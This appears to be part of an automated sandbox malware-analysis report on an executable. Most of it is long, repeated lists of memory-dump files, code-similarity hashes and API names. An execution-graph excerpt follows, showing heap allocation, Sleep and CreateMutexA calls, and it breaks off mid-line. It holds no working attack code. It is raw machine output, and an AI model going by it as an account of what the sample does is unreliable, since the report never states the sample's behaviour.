                                                                                                                                                                • Associated: 00000000.00000002.2183798599.000000000030E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183816602.000000000030F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183834127.0000000000316000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183854335.000000000031B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183873864.0000000000322000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183903490.0000000000326000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183931663.000000000032E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183967335.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183994600.000000000033F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184019272.0000000000340000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184058705.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000036D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184134803.0000000000384000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184153740.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184177499.000000000039B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184195693.000000000039C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184216554.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184258734.00000000003A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184299165.00000000003B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184335891.00000000003B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_a0000_random.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ___std_exception_copy___std_exception_destroy
                                                                                                                                                                • String ID: t#
                                                                                                                                                                • API String ID: 2970364248-134853180
                                                                                                                                                                • Opcode ID: 78d4145a33f4c65b5a94e56fcf3298b6c469195c3e78cd223ce8e432a876cbe1
                                                                                                                                                                • Instruction ID: 04c1f1363d357f1257890f5e6c6055e0ca832f80875d7dabce574b665604d56b
                                                                                                                                                                • Opcode Fuzzy Hash: 78d4145a33f4c65b5a94e56fcf3298b6c469195c3e78cd223ce8e432a876cbe1
                                                                                                                                                                • Instruction Fuzzy Hash: F9717271D002489BDB04DF98C885BEDFBB5EF59310F14812EE815B7346EB74A944CBA5
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2182917529.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2182669159.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2182917529.0000000000102000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183000574.0000000000109000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183023491.000000000010B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183049504.0000000000117000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183174403.000000000026E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183198375.0000000000270000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183272831.0000000000293000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183296339.0000000000294000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183317982.0000000000295000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183338775.0000000000296000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183359688.0000000000297000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183383671.0000000000299000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183410807.00000000002A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183441616.00000000002A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183484425.00000000002BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183508664.00000000002C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183530942.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183571136.00000000002D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183600749.00000000002DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183626520.00000000002E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183651042.00000000002E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183675519.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183715487.00000000002F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183760013.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183798599.000000000030E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183816602.000000000030F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183834127.0000000000316000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183854335.000000000031B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183873864.0000000000322000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183903490.0000000000326000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183931663.000000000032E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183967335.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183994600.000000000033F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184019272.0000000000340000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184058705.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000036D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184134803.0000000000384000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184153740.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184177499.000000000039B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184195693.000000000039C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184216554.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184258734.00000000003A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184299165.00000000003B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184335891.00000000003B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_a0000_random.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: list too long$t#
                                                                                                                                                                • API String ID: 0-1282745477
                                                                                                                                                                • Opcode ID: 8f3e1916a4a2b8cb9c48f12095dd7d0a734785d98336b12862eecb601edd41db
                                                                                                                                                                • Instruction ID: 72fbe747ea751bb5e45ecdf64728916471cf2c9d4d57c7ce332b0b232f561bc5
                                                                                                                                                                • Opcode Fuzzy Hash: 8f3e1916a4a2b8cb9c48f12095dd7d0a734785d98336b12862eecb601edd41db
                                                                                                                                                                • Instruction Fuzzy Hash: 1E6180B09047589BEB10DF64CD49FD9F7F4EF05700F1041AAE809AB282EBB1AA81CB55
                                                                                                                                                                APIs
                                                                                                                                                                • ___std_exception_copy.LIBVCRUNTIME ref: 000A29DF
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2182917529.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2182669159.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2182917529.0000000000102000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183000574.0000000000109000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183023491.000000000010B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183049504.0000000000117000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183174403.000000000026E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183198375.0000000000270000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183272831.0000000000293000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183296339.0000000000294000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183317982.0000000000295000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183338775.0000000000296000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183359688.0000000000297000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183383671.0000000000299000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183410807.00000000002A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183441616.00000000002A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183484425.00000000002BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183508664.00000000002C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183530942.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183571136.00000000002D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183600749.00000000002DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183626520.00000000002E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183651042.00000000002E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183675519.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183715487.00000000002F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183760013.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183798599.000000000030E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183816602.000000000030F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183834127.0000000000316000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183854335.000000000031B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183873864.0000000000322000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183903490.0000000000326000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183931663.000000000032E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183967335.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183994600.000000000033F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184019272.0000000000340000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184058705.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000036D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184134803.0000000000384000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184153740.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184177499.000000000039B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184195693.000000000039C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184216554.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184258734.00000000003A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184299165.00000000003B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184335891.00000000003B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_a0000_random.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ___std_exception_copy
                                                                                                                                                                • String ID: t#$t#
                                                                                                                                                                • API String ID: 2659868963-1898090486
                                                                                                                                                                • Opcode ID: 2afd48e71880fd4da0c4997eab7530427229c781231606cf3684b85dce2c7f7a
                                                                                                                                                                • Instruction ID: cebbb9dd78f3a42ab7f73b531c7f8e10d594d70fd1b7e5dd840bf37197da7d37
                                                                                                                                                                • Opcode Fuzzy Hash: 2afd48e71880fd4da0c4997eab7530427229c781231606cf3684b85dce2c7f7a
                                                                                                                                                                • Instruction Fuzzy Hash: FB31A0719102099FC714DF98C840BDEFBF9EB49720F14862AF514E7B41E775A954CBA0
                                                                                                                                                                APIs
                                                                                                                                                                • ___std_exception_copy.LIBVCRUNTIME ref: 000A2B63
                                                                                                                                                                Strings
                                                                                                                                                                • This function cannot be called on a default constructed task, xrefs: 000A2B43
                                                                                                                                                                • t#, xrefs: 000A2B36
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2182917529.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2182669159.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2182917529.0000000000102000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183000574.0000000000109000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183023491.000000000010B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183049504.0000000000117000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183174403.000000000026E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183198375.0000000000270000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183272831.0000000000293000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183296339.0000000000294000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183317982.0000000000295000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183338775.0000000000296000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183359688.0000000000297000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183383671.0000000000299000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183410807.00000000002A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183441616.00000000002A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183484425.00000000002BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183508664.00000000002C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183530942.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183571136.00000000002D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183600749.00000000002DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183626520.00000000002E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183651042.00000000002E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183675519.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183715487.00000000002F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183760013.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183798599.000000000030E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183816602.000000000030F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183834127.0000000000316000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183854335.000000000031B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183873864.0000000000322000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183903490.0000000000326000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183931663.000000000032E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183967335.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183994600.000000000033F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184019272.0000000000340000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184058705.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000036D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184134803.0000000000384000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184153740.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184177499.000000000039B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184195693.000000000039C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184216554.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184258734.00000000003A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184299165.00000000003B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184335891.00000000003B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_a0000_random.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ___std_exception_copy
                                                                                                                                                                • String ID: This function cannot be called on a default constructed task$t#
                                                                                                                                                                • API String ID: 2659868963-2092867519
                                                                                                                                                                • Opcode ID: 46b351a2dd97ba672fc37836c9d8760c87baf28225d22055b1dd42b726066842
                                                                                                                                                                • Instruction ID: ab9cd45007503f815066f60a17c863083a207610c9ea106a7ce9e3c3139b88de
                                                                                                                                                                • Opcode Fuzzy Hash: 46b351a2dd97ba672fc37836c9d8760c87baf28225d22055b1dd42b726066842
                                                                                                                                                                • Instruction Fuzzy Hash: AFF08C71D1030C9BC710EF68D8419EEBBF9AF15300B1082AEF94067601EBB56A589BA5

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:1%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                Total number of Nodes:1890
                                                                                                                                                                Total number of Limit Nodes:9
                                                                                                                                                                execution_graph 9971 b89ab8 9973 b89acc 9971->9973 9974 b89b08 9973->9974 9975 b89b4b shared_ptr 9974->9975 9979 b8a917 9974->9979 9976 b89b59 9975->9976 9977 b89b65 9975->9977 9983 b980c0 RtlAllocateHeap 9976->9983 10000 b97a00 9977->10000 9981 b8a953 Sleep CreateMutexA 9979->9981 9982 bb6c6a RtlAllocateHeap 9979->9982 9980 b89b74 10014 b85c10 9980->10014 9987 b8a98e 9981->9987 9982->9981 9985 b8a903 9983->9985 9986 b89b7c 10065 b88b30 9986->10065 9989 b89b8d 10102 b98220 9989->10102 9991 b89b9c 9992 b97a00 RtlAllocateHeap 9991->9992 9993 b89ca9 9992->9993 9994 b85c10 4 API calls 9993->9994 9995 b89cb1 9994->9995 9996 b88b30 4 API calls 9995->9996 9997 b89cc2 9996->9997 9998 b98220 RtlAllocateHeap 9997->9998 9999 b89cd1 9998->9999 10001 b97a26 10000->10001 10002 b97a2d 10001->10002 10003 b97a81 10001->10003 10004 b97a62 10001->10004 10002->9980 10008 b9d3e2 RtlAllocateHeap 10003->10008 10012 b97a76 __cftof 10003->10012 10005 b97ab9 10004->10005 10006 b97a69 10004->10006 10009 b82480 RtlAllocateHeap 10005->10009 10007 b9d3e2 RtlAllocateHeap 10006->10007 10010 b97a6f 10007->10010 10008->10012 10009->10010 10011 bb6c6a RtlAllocateHeap 10010->10011 10010->10012 10013 b97ac3 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ __Cnd_unregister_at_thread_exit 10011->10013 10012->9980 10013->9980 10110 b85940 10014->10110 10016 b85c54 10113 b84b30 10016->10113 10018 b85d17 shared_ptr __floor_pentium4 10018->9986 10019 b85c7b shared_ptr 10019->10018 10020 bb6c6a RtlAllocateHeap 10019->10020 10021 b85d47 __cftof 10020->10021 10021->10021 10022 b980c0 RtlAllocateHeap 10021->10022 10024 b85e3e 10022->10024 10023 b85ea6 shared_ptr __floor_pentium4 10023->9986 10024->10023 10025 bb6c6a RtlAllocateHeap 10024->10025 10026 b85ed2 10025->10026 10027 b85ffe shared_ptr __floor_pentium4 10026->10027 10028 bb6c6a RtlAllocateHeap 10026->10028 10027->9986 10029 b8601b 10028->10029 10030 b980c0 RtlAllocateHeap 10029->10030 10031 b86089 10030->10031 10032 b980c0 RtlAllocateHeap 10031->10032 10033 b860bd 10032->10033 10034 b980c0 RtlAllocateHeap 10033->10034 10035 b860ee 10034->10035 10036 b980c0 RtlAllocateHeap 10035->10036 10037 b8611f 10036->10037 10038 b980c0 RtlAllocateHeap 10037->10038 10040 b86150 10038->10040 10039 b865b1 shared_ptr __floor_pentium4 10039->9986 10040->10039 10041 bb6c6a RtlAllocateHeap 10040->10041 10042 b865dc 10041->10042 10043 b97a00 RtlAllocateHeap 10042->10043 10044 b866a6 10043->10044 10045 b85c10 4 API calls 10044->10045 10046 b866ac 10045->10046 10047 b85c10 4 API calls 10046->10047 10048 b866b1 10047->10048 10120 b822c0 10048->10120 10050 b866c9 shared_ptr 10051 b97a00 RtlAllocateHeap 10050->10051 10052 b86732 10051->10052 10053 b85c10 4 API calls 10052->10053 10054 b8673d 10053->10054 10055 b822c0 4 API calls 10054->10055 10056 b86757 shared_ptr 10055->10056 10057 b86852 10056->10057 10059 b97a00 RtlAllocateHeap 10056->10059 10062 b85c10 4 API calls 10056->10062 10063 b822c0 4 API calls 10056->10063 10058 b980c0 RtlAllocateHeap 10057->10058 10060 b8689c 10058->10060 10059->10056 10061 b980c0 RtlAllocateHeap 10060->10061 10064 b868e3 shared_ptr __floor_pentium4 10061->10064 10062->10056 10063->10056 10064->9986 10066 b88b7c 10065->10066 10067 b97a00 RtlAllocateHeap 10066->10067 10068 b88b8c 10067->10068 10069 b85c10 4 API calls 10068->10069 10070 b88b97 10069->10070 10071 b980c0 RtlAllocateHeap 10070->10071 10072 b88be3 10071->10072 10073 b980c0 RtlAllocateHeap 10072->10073 10074 b88c35 10073->10074 10075 b98220 RtlAllocateHeap 10074->10075 10076 b88c47 shared_ptr 10075->10076 10077 bb6c6a RtlAllocateHeap 10076->10077 10078 b88d01 shared_ptr __floor_pentium4 10076->10078 10079 b88d2d 10077->10079 10078->9989 10080 b97a00 RtlAllocateHeap 10079->10080 10081 b88d8f 10080->10081 10082 b85c10 4 API calls 10081->10082 10083 b88d9a 10082->10083 10084 b980c0 RtlAllocateHeap 10083->10084 10085 b88dec 10084->10085 10086 b98220 RtlAllocateHeap 10085->10086 10088 b88dfe shared_ptr 10086->10088 10087 b88e7e shared_ptr __floor_pentium4 10087->9989 10088->10087 10089 bb6c6a RtlAllocateHeap 10088->10089 10090 b88eaa 10089->10090 10091 b97a00 RtlAllocateHeap 10090->10091 10092 b88f0f 10091->10092 10093 b85c10 4 API calls 10092->10093 10094 b88f1a 10093->10094 10095 b980c0 RtlAllocateHeap 10094->10095 10096 b88f6c 10095->10096 10097 b98220 RtlAllocateHeap 10096->10097 10099 b88f7e 